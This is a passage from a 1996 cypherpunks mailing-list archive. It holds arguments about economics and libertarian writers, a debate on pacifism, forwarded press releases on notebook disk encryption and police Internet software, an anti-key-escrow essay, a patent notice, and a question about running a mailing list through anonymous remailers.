a species from going extinct is for people not to buy it. Its one of
the msot idiotic statements I've heard in years. As a nobel prize
winning economist, Friedman understands things like commons issues and
the public goods problem and I cannot believe he would ever make such
an inane statment, no matter what you claim.

Given your poor record with facts here recently (nearly every
assertion you have made about the Hillary Clinton case, from claiming
she was trading options when she traded futures to obviously having no
knowledge of the size of her trades), I will want to see a reprint of
the article you claim exists before I will accept that there is any
validity to your claims whatsoever.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: caal@hopf.dnai.com
Date: Sat, 8 Jun 1996 11:37:08 +0800
To: cypherpunks@toad.com
Subject: "EASYSAFE(R) VERSION 3.0
Message-ID: <199606072136.OAA24986@hopf.dnai.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought this may be of interest to the list.

>[PRNewswire:Computers-0605.14]    6/5/96
>
>        EASYSAFE(R) VERSION 3.0 FOR DOS, WINDOWS & WINDOWS 95 'FIRST
>        NOTEBOOK SECURITY PRODUCT'
>        
>            CHICAGO, June 5 /PRNewswire/ - EliaShim Safe Software, a leading
>        provider of network security products and anti-virus protection
>        systems, announced at Spring Comdex 96 the release of EasySafe,
>        version 3.0, the first security and encryption product designed
>        specifically for notebook computers.
>        
>        .. EasySafe provides bullet-proof protection that is easy to install.
>        .. EasySafe prevents unauthorized use or access through boot password
>          protection.
>        .. EasySafe prevents removal or transfer of information via full hard
>          disk encryption.
>        .. EasySafe provides keyboard locking after three incorrect password
>          attempts.
>        .. EasySafe provides screen blanking after a predetermined period of
>          inactivity.
>        .. EasySafe denies system level access to hard disk information.
>        .. EasySafe can be configured to disable LPT, COM, and Floppy ports.
>        
>            Upon boot-up, EasySafe asks the user for a password.  A
>        correctly entered password grants the user access to the computer.
>        Encryption/decryption of data on the hard disk is dynamic and
>        completely transparent to the user.  The system allows for three
>        password attempts before locking the computer, and only a cold-boot
>        reset is possible. After entering the correct password, the disk is
>        unencrypted dynamically, normal boot up takes place, and the user is
>        granted access to the system without disk access restrictions or
>        delay.
>        
>            EasySafe includes a DOS/Windows screen saving utility which
>        blanks the screen after a period of inactivity.  The only way to re-
>        activate the computer is to enter the correct password.
>        
>            EasySafe offers two encryption methods.  The first encrypts all
>        data on local hard drives.  The second method encrypts boot sectors
>        and partitions.  This prevents unauthorized users from booting from
>        the "A": drive and accessing the data on the hard disk.  This
>        encryption scheme also protects against the use of disk editing
>        programs (such as Norton Utilities).  Thus, valuable company secrets
>        remain hidden and secure. EasySafe can be configured to disable LPT,
>        COM, and Floppy ports to ensure that the information contained on
>        the hard drive cannot be transferred to another system for later
>        viewing.
>        
>            While annual purchases of notebook computers have increased
>        steadily, the number of notebooks reported stolen each year is much
>        more alarming.  In 1995, 208,000 notebooks with a value of almost
>        $640 million were reported stolen by a Columbus, Ohio insurance
>        company that offers coverage for portable computers (Information
>        Week - May 6, 1996 issue).  EasySafe is the perfect product for
>        those field professionals whose notebooks contain valuable,
>        confidential, company information and other sensitive data that is
>        hundreds of times more valuable than the cost of a notebook.
>        
>            Founded in 1983, EliaShim Safe Software has been providing PC
>        security solutions and anti-virus protection for corporate,
>        government, educational institutions, and program developers in both
>        domestic and international markets.  Over four million computers are
>        protected worldwide.  Product line includes: EasySafe, MasterSafe,
>        ViruSafe Gold, and ViruSafe LAN.
>        
>        -0-                        6/5/96
>        /CONTACT:  Carl Frederick, Jr., Director of Marketing, EliaShim
>        Microcomputers, 800-477-5177, or at Spring Comdex 96, Booth . C5431,
>        312-
>        791-6708/
>        
>        CO:  EliaShim Microcomputers, Inc.
>        ST:  Florida
>        IN:  CPR
>        SU:  PDT
>        
>      





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: caal@hopf.dnai.com
Date: Sat, 8 Jun 1996 16:17:48 +0800
To: cypherpunks@toad.com
Subject: "EASYSAFE(R) VERSION 3.0
Message-ID: <199606072143.OAA25549@hopf.dnai.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought this may be of interest to the list.

>[PRNewswire:Computers-0605.14]    6/5/96
>
>        EASYSAFE(R) VERSION 3.0 FOR DOS, WINDOWS & WINDOWS 95 'FIRST
>        NOTEBOOK SECURITY PRODUCT'
>        
>            CHICAGO, June 5 /PRNewswire/ - EliaShim Safe Software, a leading
>        provider of network security products and anti-virus protection
>        systems, announced at Spring Comdex 96 the release of EasySafe,
>        version 3.0, the first security and encryption product designed
>        specifically for notebook computers.
>        
>        .. EasySafe provides bullet-proof protection that is easy to install.
>        .. EasySafe prevents unauthorized use or access through boot password
>          protection.
>        .. EasySafe prevents removal or transfer of information via full hard
>          disk encryption.
>        .. EasySafe provides keyboard locking after three incorrect password
>          attempts.
>        .. EasySafe provides screen blanking after a predetermined period of
>          inactivity.
>        .. EasySafe denies system level access to hard disk information.
>        .. EasySafe can be configured to disable LPT, COM, and Floppy ports.
>        
>            Upon boot-up, EasySafe asks the user for a password.  A
>        correctly entered password grants the user access to the computer.
>        Encryption/decryption of data on the hard disk is dynamic and
>        completely transparent to the user.  The system allows for three
>        password attempts before locking the computer, and only a cold-boot
>        reset is possible. After entering the correct password, the disk is
>        unencrypted dynamically, normal boot up takes place, and the user is
>        granted access to the system without disk access restrictions or
>        delay.
>        
>            EasySafe includes a DOS/Windows screen saving utility which
>        blanks the screen after a period of inactivity.  The only way to re-
>        activate the computer is to enter the correct password.
>        
>            EasySafe offers two encryption methods.  The first encrypts all
>        data on local hard drives.  The second method encrypts boot sectors
>        and partitions.  This prevents unauthorized users from booting from
>        the "A": drive and accessing the data on the hard disk.  This
>        encryption scheme also protects against the use of disk editing
>        programs (such as Norton Utilities).  Thus, valuable company secrets
>        remain hidden and secure. EasySafe can be configured to disable LPT,
>        COM, and Floppy ports to ensure that the information contained on
>        the hard drive cannot be transferred to another system for later
>        viewing.
>        
>            While annual purchases of notebook computers have increased
>        steadily, the number of notebooks reported stolen each year is much
>        more alarming.  In 1995, 208,000 notebooks with a value of almost
>        $640 million were reported stolen by a Columbus, Ohio insurance
>        company that offers coverage for portable computers (Information
>        Week - May 6, 1996 issue).  EasySafe is the perfect product for
>        those field professionals whose notebooks contain valuable,
>        confidential, company information and other sensitive data that is
>        hundreds of times more valuable than the cost of a notebook.
>        
>            Founded in 1983, EliaShim Safe Software has been providing PC
>        security solutions and anti-virus protection for corporate,
>        government, educational institutions, and program developers in both
>        domestic and international markets.  Over four million computers are
>        protected worldwide.  Product line includes: EasySafe, MasterSafe,
>        ViruSafe Gold, and ViruSafe LAN.
>        
>        -0-                        6/5/96
>        /CONTACT:  Carl Frederick, Jr., Director of Marketing, EliaShim
>        Microcomputers, 800-477-5177, or at Spring Comdex 96, Booth . C5431,
>        312-
>        791-6708/
>        
>        CO:  EliaShim Microcomputers, Inc.
>        ST:  Florida
>        IN:  CPR
>        SU:  PDT
>        
>      





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: caal@hopf.dnai.com
Date: Sat, 8 Jun 1996 14:50:24 +0800
To: cypherpunks@toad.com
Subject: Internet Police
Message-ID: <199606072143.OAA25552@hopf.dnai.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone seen this yet?  Looks like it's two weeks old.  Internet Police!

>[BizWire]    5/20/96
>
>        (SUN/PSI-INTL)(SUNW) PSI International, Sun partner, unveils Java-
>        based Internet solution for law enforcement agencies; "Internet in
>        Blue" Police Internet/Intranet Application Suite Available in July
>        1996 
>        
>          Business Editors/Computer Writers
>        
>        Highlights:
>            -- Internet in Blue, one of the first Java-based solutions aimed
>        at fighting crime, is being introduced by PSI International, a
>        strategic partner of Sun Microsystems Federal, and includes other
>        Sun products.  
>        
>            -- Internet in Blue combines the power of Java and Netra servers
>        to enable law enforcement agencies and police departments to quickly
>        leverage the capabilities of the Internet and intranets.  
>        
>            -- This solution is the latest evidence of Sun taking advantage
>        of the significant market opportunity for crime prevention
>        technology.  Last year, Sun Federal announced a dedicated Criminal
>        Justice Operation, which is working with police departments and law
>        enforcement agencies around the world to help them use technology in
>        fighting crime.  
>        
>            MOUNTAIN VIEW, Calif.--(BUSINESS WIRE)-- May 20, 1996--One of
>        the first Sun(TM) Java(TM)-based solutions aimed at fighting crime
>        was introduced today by PSI International, a strategic partner of
>        Sun Microsystems Federal, a subsidiary of Sun Microsystems, Inc.  
>        
>            Called Internet in Blue(TM), the solution combines the power of
>        Sun's Java technology, its Netra(TM) Internet servers, its Java
>        WorkShop(TM) development tools, and PSI's relational database
>        software. This solution fully leverages the capabilities of the
>        Internet for the benefit of law enforcement agencies because of the
>        inclusion of Java, the revolutionary Internet platform from Sun that
>        makes possible fast, easy, operating-system-independent use of the
>        Internet.  
>        
>            To be offered by PSI, Internet in Blue will enable police
>        departments and other law enforcement agencies to leverage the
>        latest Internet technology to fight crime and promote citizen
>        involvement and community-based policing.  From a citizen's
>        perspective, having a local police force with an Internet presence
>        gives people the opportunity to report problems online and play a
>        more active role in fighting crime in their neighborhoods.  
>        
>            Besides utilizing the Internet, the PSI solution also allows
>        local police to build an "intranet," which is a greatly enhanced
>        internal information network to handle departmental processes as
>        well as to speedily access any internal database of interest.
>        Examples of these databases include local crime data such as
>        patterns of crimes, gang affiliations, data on previous suspects and
>        arrests.  Currently, many police departments must locate such data
>        via a paper trail, which is very inefficient.  
>        
>            "Law enforcement agencies are quickly realizing the power of the
>        Internet and intranets as strategic tools in fighting crime," said
>        John Marselle, president of Sun Microsystems Federal.  "The Internet
>        in Blue solution from PSI -- based on Sun technology -- takes
>        advantage of Java's security features, platform independence and
>        database access capabilities.  It should make it much easier for
>        police departments and other criminal justice organizations to get
>        online and to leverage the capabilities of the network."  
>        
>            With Java WorkShop, a visual development environment for Java
>        that can be included as part of the Internet in Blue solution,
>        police departments can design, test, deploy and maintain Internet
>        and intranet applications based on Java with speed and simplicity.
>        Java WorkShop runs on the Sun Solaris(TM) environment and Windows
>        95/NT.  Using Java, the PSIBase relational database management
>        system can access Web browsers across any hardware platform.  
>        
>            "The Internet is the next frontier in the development of law
>        enforcement information systems," said Paul Wormeli, program
>        director for law enforcement at PSI.  "Our Internet in Blue solution
>        will enable law enforcement agencies to quickly exploit the latest
>        technologies like Java."  
>        
>        Internet in Blue includes the following:
>        
>            A starter kit with a Sun Netra Internet server and PSI software
>        and services needed to set up a site on the World Wide Web, as well
>        as technical assistance from PSI for developing content and training
>        for a Webmaster.  
>        
>            A full set of applications to create a police intranet providing
>        secure internal access to selected crime information, standard
>        operating police procedures and other infrastructure services.  
>        
>            An interactive, community-based communications medium to
>        facilitate crime reporting over the Internet and community-based
>        policing.  
>        
>            Suggestions for services that law enforcement agencies can
>        develop in order to offset the cost of the Internet project, such as
>        providing online crime reports and accident report information to
>        authorized outside organizations including legal firms and insurance
>        companies.  -0-
>        
>            The Internet in Blue product will be available in July, 1996.
>        Pricing will vary depending on customer needs.  
>        
>            PSI International, Inc. has provided systems integration and
>        services for over 14 years to federal, state and local governments.
>        The company specializes in law enforcement and public safety
>        solutions, consulting services, and integration of software and
>        hardware.  With a staff of over 250 professionals in the information
>        system and services industry, PSI has a team of people that have
>        both technical and industry knowledge of public safety and justice
>        applications, including computer aided dispatch, records and
>        investigative management, imaging, telecommunications, and mobile
>        computing.  
>        
>            Sun Microsystems Federal, Inc., headquartered in Vienna,
>        Virginia, is a subsidiary of Sun Microsystems, Inc.  Sun Federal's
>        charter is to develop, deliver and sustain markets for Sun products
>        in governments worldwide.  
>        
>            With annual revenues of $6 billion, Sun Microsystems, Inc.,
>        provides solutions that enable customers to build and maintain open
>        network computing environments.  Widely recognized as a proponent of
>        open standards, the company is involved in the design, manufacture
>        and sale of products, technologies and services for commercial and
>        technical computing.  Sun's SPARC(TM) workstations, multiprocessing
>        servers, SPARC microprocessors, Solaris(Tm) operating software and
>        ISO-certified service organization each rank No. 1 in the UNIX(TM)
>        industry.  Founded in 1982, Sun is headquartered in Mountain View,
>        Calif., and employs more than 16,000 people worldwide.  -0-
>        
>            Note to Editors: Sun, the Sun logo, Sun Microsystems, Java, Java
>        Workshop, Netra and Solaris are trademarks or registered trademarks
>        of Sun Microsystems, Inc. in the United States and in other
>        countries.  All SPARC trademarks are used under license and are
>        trademarks or registered trademarks of SPARC International, Inc. in
>        the United States and other countries.  Products bearing SPARC
>        trademarks are based upon an architecture developed by Sun
>        Microsystems, Inc.  UNIX is a registered trademark in the United
>        States and other countries exclusively licensed through X/Open
>        Company, Ltd.  
>        
>            Internet in Blue is a trademark of PSI, International and is
>        properly written in boldface italics, all lower case.  
>        
>            Press announcements and other information about Sun Microsystems
>        are available on the Internet via the World Wide Web using a tool
>        such as Netscape or NCSA Mosaic.  Type http://www.sun.com at the URL
>        prompt.  
>        
>        --30--css/sf*
>        
>        CONTACT: Burson-Marsteller (for Sun)
>                 Jane Rauckhorst, 212/614-4880
>                     or
>                 PSI International
>                 Martha Hill, 703/352-8700
>        
>        KEYWORD: CALIFORNIA
>            INDUSTRY KEYWORD: COMPUTERS/ELECTRONICS COMED
>        INTERACTIVE/MULTIMEDIA/INTERNET PRODUCT GOVERNMENT
>        
>         REPEATS: New York 212-752-9600 or 800-221-2462; Boston 617-236-4266
>        or 800-225-2030; SF 415-986-4422 or 800-227-0845; LA 310-820-9473 BW
>        URL: http://www.businesswire.com
>        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Sat, 8 Jun 1996 12:02:48 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
In-Reply-To: <199606071820.OAA18322@jekyll.piermont.com>
Message-ID: <9606071852.AA04637@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>Not nearly as big as insisting that all around acknowledge your
>doctorate must make you feel, Dr. Phill Hallam-Baker, PhD.

It was you who insited on calling me "Mr Baker" despite the fact that we have 
been introduced. If you insist on being formal you can get it right. Its a 
D.Phil by the way, not a PhD.


>I like the fact, by the way, that you essentially ignored the
>substance of my comments, and instead chose to discuss peripheral matters.

Good.


	Phill

PS, I don't recommend that people read the works of the late Cato Institute 
staffer mentioned. There are better authorities than the speechwriter of Barry 
Goldwater.

If people are interested in Philosophy then I suggest they read "A History of 
Western Philosophy" by Bertrand Russel. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 8 Jun 1996 09:30:20 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: Anonymous stock trades.
In-Reply-To: <9606071852.AA04637@Etna.ai.mit.edu>
Message-ID: <199606071900.PAA18399@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> PS, I don't recommend that people read the works of the late Cato
> Institute staffer mentioned. There are better authorities than the
> speechwriter of Barry Goldwater.

Karl Hess Jr (PhD). wasn't Barry Goldwater's speechwriter. His father
was. His father didn't have a PhD -- indeed, he never attended a state
run school past his early teenage years. Karl Hess senior also was
never a Cato instutute staffer -- to my knowledge, his son is not on
the staff of the Cato institute either. Its astounding how many
inaccurate comments you can pack into a brief space.

Dr. Phill Hallam-Baker, D.Phil (one wonders how a doctor of philosophy
differs from a PhD since that is also a doctor of philosophy) seems to
spew random inaccuracies left and right.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herr Wendigo <wendigo@gti.net>
Date: Sat, 8 Jun 1996 15:21:55 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Clinton To Cipher Whitewater Video (fwd)
Message-ID: <199606071922.PAA04435@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


An entity claiming to be Matthew Gaylor wrote:
>From freematt@coil.com Fri Jun  7 12:31:25 1996
Date: Fri, 7 Jun 1996 12:02:40 -0400
X-Sender: freematt@bronze.coil.com
Message-Id: <v0213050badddc7a0b29f@[198.4.94.200]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: freematt@coil.com (Matthew Gaylor)
From: freematt@coil.com (Matthew Gaylor)
Subject: Clinton To Cipher Whitewater Video

From: softwa19@us.net (Charles R. Smith)
Subject: Clinton To Cipher Whitewater Video

President Clinton is scheduled to video-tape his testimony in
the second Whitewater trial.  He will do so from the oval office
in July.  The first video taped testimony he sent to an Arkansas
court room was scrambled in order to protect his personal and
political privacy.  One can only assume that the President will
also encrypt his second testimony for the same reasons.  I have
no problem with the President exercising his rights to use
encryption.  That is what the defensive technology is for.
However, President Clinton is also engaged in an effort to
deny that very same right from ordinary citizens.

The Clinton administration has tried for several years to ban or
remove all defensive encryption security from computers,
stressing that crime had a higher priority over privacy.  His
latest Clipper III proposal would require all U.S. citizens to
turn over their keys (escrow) so that the FBI can ensure that no
one is using their computer for criminal activities.  In effect,
the proposal would invalidate the First, Fourth and Fifth
amendments.  Escrow is the modern equal to the FBI demanding
your house key.  This is so the FBI can check in every now and
then.  Yet, instead of making life safer, the proposal will
leave us wide open for hacker attack.

It is a fact that the Clinton record of computer security is so
poor that the GAO reported over 160,000 successful penetrations
against just the Defense Department in 1995.  In fact, during
one incident, a 16 year old hacker could have started a war
between North Korea and America (Rome NY USAF Base/Korean Atomic
Research Facility 1995). Please note - DOD has the best computer
security record of all government agencies!  That means the
situation at the FBI, BATF, FAA, HUD and IRS is worse.  Much
worse.  The computers that control the military, financial,
industrial, medical and political heart of America are waiting
for a Digital Pearl Harbor, left undefended by Presidental
order.  His proposal also assumes that a huge bureaucracy
erected to monitor escrowed keys would be more secure than our
nuclear arsenal.  Ridiculous.

President Clinton has risked global nuclear war to push
intrusive and obsolete ideas which protect nothing.  Instead,
President Clinton should heed the GAO report which concluded
that securing million dollar military computers with no
encryption software, no firewalls and untrained, part-timers, is
the wrong thing to do.  President Clinton demands his personal
and legal privacy but refuses to support the same for you and
me.  President Clinton has risked our personal safety and our
common democracy in order to create a large bureaucracy of
lawyers who will do nothing but count bits.  The President
should take a lesson from his own actions, cipher thyself, and
protect America.  He should join Senator Bob Dole and a whole
crowd of Bi-partisan elected officals in supporting the PROCODE
bill (S. 1726).  This bill gives every American the right to
encrypt.  The right to personal privacy.  The same right Bill
Clinton enjoyed during the last video session at the Whitehouse.

1 if by land, 2 if by sea.  Paul Revere - Encryption 1775
Charles R. Smith
SOFTWAR  Richmond, VA  http://ally.ios.com/~softwa19

PCYPHER signature:
4279C640DB607D4D13B808082D7CC6F23938320C1956E31A50781D192D627672
601D141C6516051C061976462B382C294542435F19665B2B316E174955445C56
5A506675180400041F030A001472657A6A1201191C0E0003784FCCE47ACB9531
E1EE5997D5E34A97A351C22B2F1871573A85BB02E3CB5C046FB24E80478AEB74
4063578E1E8019425A08091923FE6D4CA375669185FD8935B361CA6B65949FE3
57E8629F5981F5030E0AAD2BECA669808B2A038E1D89E810398F0A4DDCD2F5A7
B1E6417290D1290346BE790894F6AD1E790C57A0B457C1BE85A5D3CFB42E38E8
D5C6BDAECA57F968898F345920D5804CF5832D70534F5C66230AF099F68CAECD


****************************************************************************
Subscribe to Freematt's Alerts: Pro-Individual Rights Issues
Send a blank message to: freematt@coil.com with the words subscribe FA
on the subject line. List is private and moderated (7-30 messages per week)
Matthew Gaylor,1933 E. Dublin-Granville Rd.,#176, Columbus, OH  43229
****************************************************************************




-- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 8 Jun 1996 14:57:20 +0800
To: cypherpunks@toad.com
Subject: Re: It tolls for thee
Message-ID: <199606072243.PAA13632@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:42 AM 6/7/96 -0700, Timothy C. May wrote:
>At 7:29 AM 6/7/96, jim bell wrote:
>
>>Even so, given how much noise we've been hearing out of DC on the subject
>>of the Internet, digital cash, and good encryption, I'd say SOMEBODY is
>>getting a bit worried.  I haven't exactly been keeping this stuff a secret:
>>What do you think their reaction has been, so far?  When those
>>government-types start considering various scary scenarios, what do you
>>think they are imagining?
>
>I don't think any significant amount of the current stuff coming out of
>Washington has anything to do with my words, your words, or the words of
>anyone on this or any other forum I know about.

Okay, I was not trying to suggest that any particular source is followed.  
What I'm noticing is the almost uniformly "pessimistic" (as to the fate of 
the government) views I've read on the various computer networks, and the 
uniformly hostile reactions to government proposals.  This can't be 
reassuring to the people in power today.



>Rather, the reasons for their actions and hyperbole about the Net, the Web,
>online porn, money laundering, the "information highway," and all that
>trendy stuff is because they can see many of the same trends we see.
>
>While I have a certain amount of pride that my single-page "Crypto
>Anarchist Manifesto" essentially nailed a bunch of trends which have become
>obvious to all in the 8 years after I issued it, I don't for a picosecond
>think anything I wrote then or since has had any significant effect on
>proposed leglislation.

Don't be so sure.  Legislators, alone, don't have the smarts to figure out 
why they "needed" a Clipper-chip proposal, or the capacity to tap 1% of the 
phone calls, or other recent government proposals.  Government is usually 
very good at ignoring problems long after they become problems.  The fact 
that they're so hot to control the Internet suggests to me that somebody has 
been talking to them about what is going to happen. 
 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@MICROSOFT.com>
Date: Sat, 8 Jun 1996 13:27:35 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Anonymous stock trades.
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-960607225058Z-3624@abash1.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: 	hallam@Etna.ai.mit.edu

>The farmers want to get a freebie handout while pretending that they
>are not on 
>welfare. This leads to a mechanism which is attempting socialist
>policies ...
[etc.]
.............................................................

Okay, but what does this have to do with anonymous stock trades?


>    ..
>Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 8 Jun 1996 13:41:25 +0800
To: cypherpunks@toad.com
Subject: E-Data Systems ~ patent #4,528,643
Message-ID: <v03006f0aadde3d5ca403@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I think this has made the rounds here, already.

If it hasn't, any comments?

Cheers,
Bob Hettinga

--- begin forwarded text


Date: Fri, 7 Jun 1996 15:53:52 GMT
X-Sender: jnferree@postoffice.worldnet.att.net
Mime-Version: 1.0
To: Robert Hettinga <rah@shipwright.com>
From: "J. Neil Ferree" <jnferree@worldnet.att.net>
Subject: E-Data Systems ~ patent #4,528,643

Has anyone else received the *Amnesty* documentation from
E-data Systems of Secaucus, NJ regarding their patent on:

... system for reproducing information in material objects at a
point of sale location ...

"The patent generally describes the system and methodology
whereby products composed of digital data are purchased and
embedded electronically at a point of sale location from a host
computer. The products are typically delivered in usable form only
after payment is made. The purchaser requests delivery after the
money requirements are satisfied and authorized for the delivery
is granted. In today's vernacular, the patent covers on-demand
electronic distribution". [taken from the accompanying brochure]

Their licensing agreement (with fee schedules) addresses;

1) Content providers; Owners and sellers of products which are
sold and delivered electronically by the provider or through a
distribution network owned by another within the scope of at
least one of the E-data Systems patent claims.

2) Resellers; Distributors who provide a distribution network for
content providers to sell products within the scope of at least one
of the E-data Systems patent claims.

3) Service providers for Electronic Distribution Applications;
Providers of various services, (ie) encryption, locking, unlocking
metering, etc. who provide applications for content providers and/or
resellers within the scope of at least on of the E-data Systems patent
claims.

Contact information for E-data Systems regarding how to obtain
a license ....

Tele         800-406-1668
Web        www.3wnet.com/corp/edata
e-mail     gift@planet.net

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 8 Jun 1996 13:31:52 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
In-Reply-To: <199606071820.OAA18322@jekyll.piermont.com>
Message-ID: <v03006f0cadde3dcbbe36@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:52 PM -0400 6/7/96, hallam@Etna.ai.mit.edu wrote:

> If people are interested in Philosophy then I suggest they read "A
>History of
> Western Philosophy" by Bertrand Russel.

About the only useful thing he's said here in weeks...

Cheers,
Bob Hettinga





-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Sat, 8 Jun 1996 10:26:56 +0800
To: cypherpunks@toad.com
Subject: mailing-list through a remailer
In-Reply-To: <FBBE9A4A02502C79@-SMF->
Message-ID: <FBBE9A4A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know if the following would work:



Having a mailing-list run through a remailer??



Someone would post (through an anon remailer) about a majordomo type list 
through an anonymous remailer (anon-penet.fi for example).  You would 
send a message to 123456@anon-penet.fi, with a subscribe SECRET-LIST.  
Your message would be anonymous to the list, as the server would be to 
you.  The server would then treat your return address through the 
remailer as your address, and you would post to the anonymous account for 
the server.



It would be double blind, and difficult to find out who ran the list.  If 
you chained the remailers, it would be even more difficult.



Can this be done??



Has this been tried??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 8 Jun 1996 08:07:55 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <199606071658.JAA27327@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



 jim bell writes:

 > My impression is that it is frequently the pacifist-types who get us into 
 > war, because they start the process out by tolerating actions by others that 
 > turn into more serious actions, etc.  You know, the appeasers.  
 >

	true, too true.

	unfortunately, the point is corrrect: the pacifist do tolerate actions that 
    others would not thereby encouraging further aggression. 

	after the pacifists have been attacked, they can be particularly violent  
    --and incarcertated, they are defiant.  Or, as I prefer to put it: 

	    there is nothing worse than a liberal whose ass has been bit.


--
Hackers never stop hacking, they just get caught





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Sat, 8 Jun 1996 11:28:29 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
In-Reply-To: <199606071900.PAA18399@jekyll.piermont.com>
Message-ID: <9606072143.AA04720@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


 
Perry, 

	for a person who is picking nits you are getting rather too many wrong:
Fortunately you are now arguing in a region where I can give authoratative 
sources online. 

>Karl Hess Jr (PhD). wasn't Barry Goldwater's speechwriter. His father
>was. His father didn't have a PhD -- indeed, he never attended a state
>run school past his early teenage years. 

I had missed the Jr bit, but Hess Sr is somewhat better known.


> Karl Hess senior also was
>never a Cato instutute staffer -- to my knowledge, his son is not on
>the staff of the Cato institute either.

Wrong, try visitng the Cato Institute's site:

http://www.cato.org/people.html

You can find his papers at:

http://www.cato.org/pa-234es.html


Of course the Cato Institute may have simply added him to their "staff" list to 
make them look more important but I doubt it. 

The piece is not particularly original, Cadilac Desert made the same points in 
the early 80s. On the other hand it is a briefing paper intended to influence 
legislation so thats not suprising. Federal subsidies of water and farmland have 
turned into corporate handouts. This is hardly suprising given the mechanism. 

The farmers want to get a freebie handout while pretending that they are not on 
welfare. This leads to a mechanism which is attempting socialist policies 
without admitting that they are socialist, the handouts have to be disguised  
resulting in far more waste than if an intellectually honest policy were 
followed. In the EU there is a similar system of corrupt price support for 
agriculture, mainly supported by the French. 

I don't know of any serious political movement which supports such policies 
except for farmers advocates which does not recognise them as pork barrel.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 8 Jun 1996 13:20:41 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Anonymous stock trades.
In-Reply-To: <9606072143.AA04720@Etna.ai.mit.edu>
Message-ID: <199606072223.SAA18645@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
> > Karl Hess senior also was
> >never a Cato instutute staffer -- to my knowledge, his son is not on
> >the staff of the Cato institute either.
> 
> Wrong, try visitng the Cato Institute's site:
> 
> http://www.cato.org/people.html

He's a Cato fellow. I don't think that implies anything more than
he he gets some money from them.

Or are you on the staff of the U.S. government?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sat, 8 Jun 1996 11:28:19 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
In-Reply-To: <199606071725.KAA26027@mail.pacifier.com>
Message-ID: <19960607182852.14074.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:
 > At 04:05 AM 6/7/96 -0000, nelson@crynwr.com wrote:
 > >jim bell writes:
 > >
 > > > My impression is that it is frequently the pacifist-types who get us into 
 > > > war, because they start the process out by tolerating actions by others that 
 > > > turn into more serious actions, etc.  You know, the appeasers.  Are you an 
 > > > appeaser?
 > >
 > >A quote from Donald Wetzel's book Pacifist:
 > >
 > >The pacifist is often asked what he would do in the event the United
 > >States were to be conquered by a hostile power.  The assumption on the
 > >part of the questioner is almost always that we would simply assume
 > >the proper position in which best to have our asses kicked.  I suggest
 > >that anyone who believes that such would be the pacifist response to
 > >the imposition in America of an oppressive, authoritarian
 > >rule--foreign or domestic--should consult the prison authorities that
